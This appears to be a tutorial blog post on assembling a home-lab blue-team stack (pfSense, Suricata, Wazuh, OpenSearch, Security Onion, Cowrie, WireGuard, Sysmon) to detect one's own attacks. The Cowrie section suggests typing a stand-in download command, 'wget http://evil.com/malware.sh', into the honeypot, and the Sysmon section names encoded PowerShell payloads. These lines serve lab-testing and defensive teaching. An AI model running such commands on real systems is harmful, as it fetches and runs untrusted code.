Build Your Own Blue Team: ideas PT2

Breaking into systems is fun. Knowing when someone is breaking into yours? That’s power.

If Part 1 of this series was about arming yourself with offensive tools, this post is about building the walls, watchtowers, and alarm systems. A home lab with only attack tools is like a martial arts gym with no sparring partners — you’re throwing punches into the air. The real learning happens when you build infrastructure worth defending and then try to spot your own attacks hitting it.

The eight tools in this post will give you a complete defensive security stack: a firewall to segment and control traffic, an intrusion detection system to flag threats, a SIEM to aggregate and analyse logs, a honeypot to trap intruders, a VPN for secure remote access, and endpoint monitoring to see what’s happening on your Windows machines. Together, they form the kind of detection pipeline you’d find in a professional Security Operations Centre.

Let’s build it.

1. pfSense — The Firewall That Runs Your Lab

Every serious home lab starts with a proper firewall, and pfSense is the gold standard for open-source firewall/router software. Built on FreeBSD, it gives you enterprise-grade features — firewall rules, NAT, DHCP, DNS, VLANs, VPN, traffic shaping — all managed through a clean web interface. If your lab currently has everything dumped on a single flat network, pfSense is the tool that changes that.

How to Get It

Head to pfsense.org/download. Note that Netgate (the company behind pfSense) now promotes pfSense Plus as their primary offering. The free Community Edition (CE) is still available, but you may need to look for it specifically on the download page — it’s not always front and centre. Choose the AMD64 architecture and the ISO installer.

How to Install It

pfSense sits between your networks, so it needs at least two network interfaces — one for WAN (your home network / internet) and one for LAN (your lab network).

In a virtual environment (VirtualBox/Proxmox):

1. Create a new VM with 1GB RAM, 1 CPU, and 8GB disk.
2. Attach two network adapters: Adapter 1 as Bridged (WAN) and Adapter 2 as Host-Only or Internal Network (LAN).
3. Boot from the ISO and follow the installer. It takes about five minutes.
4. After reboot, pfSense will ask you to assign interfaces. Assign your WAN and LAN adapters.
5. The LAN interface gets a default IP of 192.168.1.1. From a machine on the LAN side, browse to http://192.168.1.1 to access the web configurator.
6. Default login is admin / pfsense. The setup wizard walks you through initial configuration.

On dedicated hardware: An old PC with two Ethernet ports works brilliantly. Netgate also sells purpose-built appliances if you want something compact and low-power.

How to Use It

Once pfSense is running, the real work begins — segmenting your lab:

• Create VLANs: Separate your attack machines from your defence infrastructure. A typical setup might have VLAN 10 for management, VLAN 20 for your attack subnet, and VLAN 30 for your target/victim network.
• Write firewall rules: Allow your Kali machine to reach vulnerable targets, but block your target VMs from reaching the internet. This mirrors real network segmentation.
• Enable logging: Turn on firewall logging for blocked traffic. You’ll feed these logs into your SIEM later.
• Set up DNS and DHCP: Let pfSense handle IP assignment and name resolution for your lab.

pfSense is also the integration point for several other tools on this list. Suricata (our next tool) runs directly as a pfSense package, and your firewall logs are some of the most valuable data you’ll send to your SIEM.

2. Suricata — Intrusion Detection That Watches the Wire

A firewall blocks traffic based on rules you write. An intrusion detection system (IDS) watches the traffic that does get through and alerts you when it sees something malicious. Suricata is an open-source IDS/IPS engine capable of real-time intrusion detection, inline intrusion prevention, network security monitoring, and offline packet processing.

How to Get It

Suricata’s documentation lives at docs.suricata.io. The best way to run it in a home lab is as a pfSense package.

How to Install It

On pfSense (recommended for home labs):

1. Log into your pfSense web interface.
2. Navigate to System → Package Manager → Available Packages.
3. Search for “suricata” and click Install.
4. After installation, go to Services → Suricata.
5. Add an interface — typically your LAN interface so you can monitor all internal lab traffic.
6. Enable the ET Open (Emerging Threats Open) ruleset. This free ruleset contains thousands of signatures for known attacks, malware, and suspicious behaviour.
7. Start Suricata on the interface.

Standalone on Ubuntu/Debian:

sudo apt install suricata
sudo suricata-update  # Downloads the latest rulesets
sudo suricata -c /etc/suricata/suricata.yaml -i eth0

How to Use It

Once Suricata is running, it will generate alerts in its eve.json log file (or in pfSense’s alerts tab). To see it in action, launch an Nmap scan from your Kali machine against a target on the monitored network:

nmap -sV -sC 192.168.30.10

Within seconds, Suricata should fire alerts about the port scan. You’ll see entries classifying the traffic as “Attempted Information Leak” or “Potentially Bad Traffic.”

The power of Suricata grows exponentially when you start customising rules. For example, to alert on any traffic containing a known Metasploit payload signature, you can write custom Suricata rules and drop them into your local rules file. But even with default rules, you’ll be shocked at how much suspicious activity Suricata flags — even in a lab environment.

3. Wazuh — Your Free SIEM/XDR Platform

Individual logs from a firewall, an IDS, and endpoints are useful. But when you correlate them all in one place, patterns emerge that you’d never see in isolation. That’s what a SIEM (Security Information and Event Management) does, and Wazuh is one of the best free options available. It combines log aggregation, threat detection, vulnerability scanning, compliance monitoring, and incident response into a single platform.

How to Get It

Visit wazuh.com/install for the installation guide. Check the documentation for the latest version number before running any commands — Wazuh releases frequently and the URLs include version numbers.

How to Install It

Wazuh has three components: the Wazuh server (processes alerts), the Wazuh indexer (stores and searches data, based on OpenSearch), and the Wazuh dashboard (web UI).

Quickstart (all-in-one on a single server):

curl -sO https://packages.wazuh.com/4.9/wazuh-install.sh
sudo bash wazuh-install.sh -a

(Replace 4.9 with the current version from the Wazuh documentation.)

This installs everything on one machine. It takes 10–15 minutes and needs at least 4GB of RAM (8GB recommended). At the end, the script prints the dashboard URL and admin credentials.

Then install agents on your lab machines:

On a Linux target, download the agent package and point it at your Wazuh server. The Wazuh documentation provides copy-pasteable commands for each OS, but the process looks like this:

# Download the agent package (check docs.wazuh.com for the current version and URL)
wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_<version>_amd64.deb
sudo WAZUH_MANAGER='<your-wazuh-server-ip>' dpkg -i wazuh-agent_*.deb
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent

On a Windows target, download the MSI agent installer from the Wazuh downloads page and point it at your Wazuh server’s IP during setup.

How to Use It

Open the Wazuh dashboard (usually https://<server-ip>:443) and you’ll see a bird’s-eye view of your lab:

• Security Events: Every alert from every agent, categorised by severity.
• Integrity Monitoring: Wazuh watches critical files on your endpoints and alerts when they change (think: an attacker modifying /etc/passwd).
• Vulnerability Detection: Wazuh scans installed packages against CVE databases.
• Active Response: Configure Wazuh to automatically block IPs or kill processes when specific conditions are met.

Here’s where the magic happens: launch an attack from your Kali machine against a Wazuh-monitored target. If you brute-force SSH, Wazuh will detect repeated authentication failures and can automatically block your attacking IP using Active Response. You’re now seeing both sides — the attack and the detection — in real time.

4. OpenSearch — The Engine Behind Your Dashboards

OpenSearch is the search and analytics engine that powers Wazuh’s data storage and visualisation. If you installed Wazuh with the all-in-one script, you already have it. But understanding OpenSearch separately is valuable because it’s the same technology stack (forked from Elasticsearch) used across the industry for log analysis, and it can ingest data from far more sources than just Wazuh.

How to Get It

Visit opensearch.org for standalone installation, or know that it’s already bundled with Wazuh.

How to Install It (Standalone)

If you want to run OpenSearch independently to ingest additional data sources:

# Using Docker
docker pull opensearchproject/opensearch:latest
docker pull opensearchproject/opensearch-dashboards:latest
docker run -d -p 9200:9200 -p 9600:9600 \
  -e "discovery.type=single-node" \
  -e "OPENSEARCH_INITIAL_ADMIN_PASSWORD=YourStr0ngP@ss!" \
  opensearchproject/opensearch:latest
docker run -d -p 5601:5601 \
  -e 'OPENSEARCH_HOSTS=["https://localhost:9200"]' \
  opensearchproject/opensearch-dashboards:latest

How to Use It

OpenSearch Dashboards (accessible on port 5601) is where you build visualisations:

• Discover: Search through raw log data with full-text queries. Type rule.description: "brute force" to find all brute-force alerts.
• Visualise: Build charts — bar graphs showing alerts over time, pie charts breaking down attack categories, geographic maps of source IPs.
• Dashboards: Combine multiple visualisations into a single view. Build a “SOC Dashboard” that shows your top 10 alert types, most targeted hosts, and a timeline of events.

When integrated with Wazuh, OpenSearch indexes every security event, making it searchable within seconds. The combination gives you the same data pipeline that enterprise security teams pay tens of thousands of pounds for — except yours is free and running in your spare room.

5. Security Onion — Threat Detection in a Box

Security Onion is a Linux distribution designed specifically for threat hunting, network security monitoring, and log management. It bundles together a curated collection of tools — Suricata, Zeek, Elasticsearch, Kibana, and others — into a cohesive platform with its own web interface. Think of it as an all-in-one security monitoring appliance.

A note on overlap: If you’ve already set up Suricata, Wazuh, and OpenSearch from the previous sections, you’ll notice that Security Onion covers some of the same ground. You don’t need both stacks running simultaneously. Security Onion is an excellent alternative if you’d prefer a single integrated deployment rather than assembling the components individually. It’s also complementary — its deep packet capture and Zeek network metadata provide visibility that goes beyond what Wazuh and Suricata alone offer. Choose the approach that suits your learning goals: individual components for understanding how each piece works, or Security Onion for a ready-made monitoring platform.

How to Get It

Download the ISO from securityonionsolutions.com.

How to Install It

1. Create a VM with at least 4 CPU cores, 16GB RAM, and 200GB of disk space. Security Onion is resource-hungry because it’s running multiple tools simultaneously.
2. Attach two network interfaces: one for management and one as a monitoring/sniffing interface.
3. Boot from the ISO and choose Standalone for a single-server deployment.
4. The setup wizard guides you through network configuration, component selection, and user creation. This takes about 20–30 minutes.
5. Once complete, access the Security Onion Console (SOC) web interface from a machine on the management network.

How to Use It

Security Onion’s web interface provides several key views:

• Alerts: Suricata IDS alerts from monitored traffic, complete with packet details.
• Hunt: Zeek network logs that show every connection, DNS query, HTTP request, and file transfer on your network — even if nothing triggered an alert.
• PCAP: Full packet capture that lets you replay and analyse any network session after the fact.
• Dashboards: Pre-built dashboards showing network activity summaries.

The killer use case: run an attack against a monitored target, then switch to Security Onion and trace exactly what the attack looked like from the network’s perspective. See the Nmap SYN scan in the Zeek connection logs. Find your Metasploit exploit in the Suricata alerts. Follow the data exfiltration in the PCAP. This kind of dual-perspective analysis is incredibly valuable for understanding how attacks manifest on the wire.

6. Cowrie — An SSH Honeypot That Traps Attackers

Honeypots are decoy systems designed to lure attackers, waste their time, and record everything they do. Cowrie is a medium-interaction SSH and Telnet honeypot that emulates a Linux server. When an attacker connects and tries to brute-force their way in, Cowrie lets them “succeed” — then logs every command they type, every file they download, and every session they initiate.

How to Get It

Clone the repository from GitHub.

How to Install It

# Install dependencies
sudo apt install git python3-venv python3-dev libssl-dev libffi-dev
# Clone and set up
git clone https://github.com/cowrie/cowrie.git
cd cowrie
python3 -m venv cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
# Configure
cp etc/cowrie.cfg.dist etc/cowrie.cfg

Edit etc/cowrie.cfg to set the hostname, listen port (default 2222), and log output format. For lab use, the defaults work well. To listen on port 22, you’ll need to redirect traffic with iptables:

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Start Cowrie:

bin/cowrie start

How to Use It

Once running, Cowrie presents a fake SSH login to anyone who connects. Try it yourself from Kali:

ssh root@<cowrie-ip>

Try common passwords — Cowrie is configured to accept certain credentials (configurable). Once “in,” you’ll see what looks like a real bash shell. Try ls, cat /etc/passwd, wget http://evil.com/malware.sh — Cowrie logs it all and even emulates a fake filesystem.

Check the logs in var/log/cowrie/cowrie.json. You’ll see every keystroke, every command, and every session. If an attacker downloads a file, Cowrie saves a copy for your analysis. This is pure gold for understanding attacker behaviour.

In your lab, point your Kali machine at Cowrie and run through a typical post-exploitation playbook. Then review the Cowrie logs and ask: “Would I have detected this? What gave the attacker away?”

7. WireGuard — Secure Remote Access to Your Lab

Your lab doesn’t have to stop at your front door. WireGuard is a modern VPN protocol that’s faster, simpler, and more secure than OpenVPN or IPsec. With WireGuard, you can securely access your entire home lab from anywhere — your phone, a coffee shop, another city — as if you were sitting on your home network.

How to Get It

Visit wireguard.com/install for platform-specific downloads.

How to Install It

On an Ubuntu/Debian server (or your pfSense box):

sudo apt install wireguard
# Generate server keys
wg genkey | tee server_private.key | wg pubkey > server_public.key

Create the server configuration at /etc/wireguard/wg0.conf:

[Interface]
PrivateKey = <server_private_key>
Address = 10.0.0.1/24
ListenPort = 51820
[Peer]
PublicKey = <client_public_key>
AllowedIPs = 10.0.0.2/32

Start the tunnel:

sudo wg-quick up wg0
sudo systemctl enable wg-quick@wg0

On your client device: Install the WireGuard app (available for Windows, macOS, Linux, iOS, Android), generate a keypair, and create a matching config that points to your server’s public IP and port.

Don’t forget to forward port 51820/UDP on your home router to your WireGuard server.

How to Use It

Once connected, your client device gets an IP on the 10.0.0.0/24 WireGuard network. With proper routing, you can now reach every machine in your lab. This means you can:

• Run Metasploit from your laptop at work against your home lab targets (on your lunch break, of course).
• Check your Wazuh dashboard from your phone.
• SSH into any lab machine from anywhere.

WireGuard’s handshake takes milliseconds and the performance overhead is minimal. It uses modern cryptography (Curve25519, ChaCha20, BLAKE2s) and has a tiny codebase — around 4,000 lines of code — which means a smaller attack surface than legacy VPN solutions.

8. Sysmon — See Everything That Happens on Windows

Windows endpoints are the most common targets in real-world attacks, and the default Windows Event Log gives you frustratingly little visibility into what’s actually happening. Sysmon (System Monitor) is a free Microsoft Sysinternals tool that dramatically extends Windows logging — capturing process creation with full command lines, network connections, file creation timestamps, registry modifications, and more.

How to Get It

Download from Microsoft Sysinternals.

How to Install It

1. Download and extract Sysmon.zip on your Windows lab VM.
2. Download a community configuration file. The most popular is SwiftOnSecurity’s Sysmon config:

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml" -OutFile sysmonconfig.xml

3. Install Sysmon with the config:

.\Sysmon64.exe -accepteula -i sysmonconfig.xml

That’s it. Sysmon is now running as a service and logging to the Windows Event Log under Applications and Services Logs → Microsoft → Windows → Sysmon.

How to Use It

Open Event Viewer and navigate to the Sysmon log. You’ll see events for:

• Event ID 1 (Process Creation): Every process that starts, with the full command line, parent process, and hashes of the executable. This catches things like powershell -enc <base64payload> that attackers love.
• Event ID 3 (Network Connection): Outbound connections with destination IP, port, and the process that initiated them. Crucial for spotting command-and-control traffic.
• Event ID 11 (File Create): New files dropped to disk, including in temp directories where malware often lands.
• Event ID 13 (Registry Modification): Changes to Run keys, Services, and other persistence mechanisms.

The next-level move: configure a Wazuh agent on the same Windows machine to forward Sysmon events to your SIEM. Wazuh has built-in decoders for Sysmon events, so they’ll appear as structured, searchable security alerts in your dashboard. Now when you run a Metasploit exploit against your Windows target, you can see the entire kill chain — from the initial connection (Sysmon Event 3) to the payload execution (Event 1) to the persistence mechanism (Event 13) — all correlated in Wazuh.

The Complete Defensive Architecture

Here’s how all eight tools work together:

pfSense sits at the edge, segmenting your network into zones and logging all traffic decisions. Suricata runs on pfSense (or alongside it), inspecting packets for known attack signatures. Security Onion provides deeper network monitoring with full packet capture and Zeek connection logs.

Wazuh aggregates logs from everywhere — pfSense firewall logs, Suricata alerts, Sysmon events from Windows endpoints, and its own file integrity monitoring. OpenSearch indexes all of this data and makes it searchable, while the Wazuh dashboard gives you a unified view.

Cowrie sits on its own, quietly pretending to be a vulnerable SSH server and recording everything attackers do when they take the bait.

WireGuard ties it all together by giving you secure access to the entire lab from anywhere.

Sysmon ensures your Windows machines log everything that matters at the endpoint level.

This is a real detection pipeline. When you attack your own lab, you’ll see alerts fire, logs correlate, and dashboards light up. That feedback loop — attack, detect, analyse, improve — is how professional security teams operate. And now it’s running in your home.

In the final post of this series, we’ll cover advanced techniques: adversary emulation, automated configuration management, network forensics, and malware analysis. The tools that separate a hobbyist lab from a serious one.

Stay vigilant.